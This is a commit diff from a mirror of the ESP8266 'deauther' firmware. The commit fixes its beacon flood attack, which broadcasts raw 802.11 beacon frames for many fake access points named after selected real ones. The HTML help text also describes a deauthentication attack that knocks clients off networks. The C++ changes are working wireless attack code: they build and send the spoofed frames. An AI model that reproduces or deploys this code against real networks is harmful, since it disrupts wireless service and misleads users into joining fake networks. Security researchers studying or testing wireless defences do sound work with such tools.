eessppeelllloo/esp8266_deauther
1
0
Fork 0
mirror of https://github.com/SpacehuhnTech/esp8266_deauther.git synced 2025-12-22 22:49:58 +01:00
Code Issues Packages Projects Releases Wiki Activity

Fixed beacon attack

Browse Source 
works now, but unfornatly only in broadcast. An targeted beacon flood attack on a specific client  is mostly dropped (maybe because of the SDK?).
This commit is contained in:
Stefan Kremser
2017-02-24 18:24:44 +01:00
parent 725f0eb18c
commit b2907561c3
8 changed files with 40 additions and 25 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
esp8266_deauther/APScan.cpp
View File

@@ -103,7 +103,13 @@ String APScan::getResults(){
void APScan::select(int num){
if(debug) Serial.println("seect "+(String)num+" - "+!selected[num]);
selected[num] = !selected[num];
if(selected[num]){
selected[num] = false;
selectedSum--;
}else{
selected[num] = true;
selectedSum++;
}
}
bool APScan::isSelected(int num){

1
esp8266_deauther/APScan.h
View File

@@ -30,6 +30,7 @@ class APScan{
bool isSelected(int num);
int results = 0;
int selectedSum;
MacList aps;
private:
int channels[maxResults];

35
esp8266_deauther/Attack.cpp
View File

@@ -50,7 +50,7 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
for(int i=0;i<6;i++){
//set target (client)
packet[4+i] = _client._get(i);
//packet[4+i] = _client._get(i);
//set source (AP)
packet[10+i] = packet[16+i] = _ap._get(i);
}
@@ -83,16 +83,18 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
}
bool Attack::send(){
delay(1); //less packets will be dropped
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
if(debug){
/*if(debug){
Serial.print(packetSize);
Serial.print(" : ");
PrintHex8(packet, packetSize);
Serial.println("");
}
}*/
return false;
}else return true;
}else{
delay(1); //less packets are beeing dropped
return true;
}
}
void Attack::run(){
@@ -143,9 +145,12 @@ void Attack::run(){
if(debug) Serial.println(" done ");
}
/* =============== Beacon Attack =============== */
if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
//int a = apScan.getFirstTarget();
for(int a=0;a<apScan.results;a++){
if(apScan.isSelected(a)){
String _ssid = apScan.getAPName(a);
@@ -158,23 +163,27 @@ void Attack::run(){
wifi_set_channel(_ch);
int _selectedClients = 0;
//int _selectedClients = 0;
for(int c=0;c<macListLen;c++){
for(int c=0;c<macListLen/apScan.selectedSum;c++){
String _apName = _ssid;
if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP "
else if(c < _restSSIDLen*2){
_apName = "."+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. ".SAMPLEAP "
_apName = " "+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. " SAMPLEAP "
}else if(c < _restSSIDLen*3){
_apName += ".";
for(int d=0;d<(_restSSIDLen-1)-c/3;d++) _apName += " ";//e.g. ".SAMPLEAP "
} else{
for(int d=0; d < _restSSIDLen-2; d++) _apName += " ";
for(int d=0; d < _restSSIDLen-1; d++) _apName += " ";
_apName += (String)c;//e.g. "SAMPLEAP 78"
}
//build a broadcast packet for this AP & SSID
buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
/*
for(int b=0;b<clientScan.results;b++){
if(clientScan.getClientSelected(b)){
_selectedClients++;
@@ -184,16 +193,15 @@ void Attack::run(){
if(send()) packetsCounter[1]++;
}
}
}*/
//if no clients are selected send the broadcast packet
if(_selectedClients == 0) if(send()) packetsCounter[1]++;
/*if(_selectedClients == 0)*/ if(send()) packetsCounter[1]++;
}
}
}
prevTime[1] = millis();
stati[1] = (String)(packetsCounter[1]*10)+"pkts/s";
packetsCounter[1] = 0;
macListChangeCounter++;
@@ -202,6 +210,7 @@ void Attack::run(){
macListChangeCounter = 0;
}
if(debug) Serial.println(" done ");
prevTime[1] = millis();
}
if(isRunning[2] && currentMillis-prevTime[2] >= 1000){

2
esp8266_deauther/Attack.h
View File

@@ -14,7 +14,6 @@ extern "C" {
#define attacksNum 2
#define macListLen 80
#define macListInterval 5
extern void PrintHex8(uint8_t *data, uint8_t length);
extern void getRandomVendorMac(uint8_t *buf);
@@ -48,6 +47,7 @@ class Attack
unsigned int packetsCounter[attacksNum];
bool isRunning[attacksNum];
int packetRate = 10;
int macListInterval = 4;
MacList beaconAdrs;

4
esp8266_deauther/data.h
View File

File diff suppressed because one or more lines are too long

4
esp8266_deauther/esp8266_deauther.ino
View File

@@ -16,7 +16,7 @@ extern "C" {
const static char *ssid = "pwned";
const static char *password = "deauther"; //must have at least 8 characters
const bool debug = true;
const bool debug = false;
ESP8266WebServer server(80);
@@ -134,7 +134,7 @@ void startClientScan(){
if(server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) {
server.send(200, "text/json", "true");
clientScan.start(server.arg("time").toInt());
attack.stop(0);
attack.stopAll();
} else server.send ( 200, "text/json", "Error: no selected access point");
}

9
htmlfiles/attack.html
View File

@@ -39,13 +39,12 @@
<br>
<b>deauth [deauthentication attack]:</b><br>
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br>
<b>Note: </b>
If no client is selected, the packets are sent as broadcast!
<br><br>
<b>beacon [beacon flood attack]:</b><br>
Sends beacon frames to the selected client(s) with the same SSID as the selected WiFi access point(s).
<br><br>
<b>Note:</b><br>
If no client is selected, the packets are sent as broadcast!
<br>
Spams beacon frames with a similar SSID as the selected WiFi access point(s).
</p>
</div>

2
htmlfiles/functions.js
View File

@@ -1,4 +1,4 @@
function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 3000){
function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 5000){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4){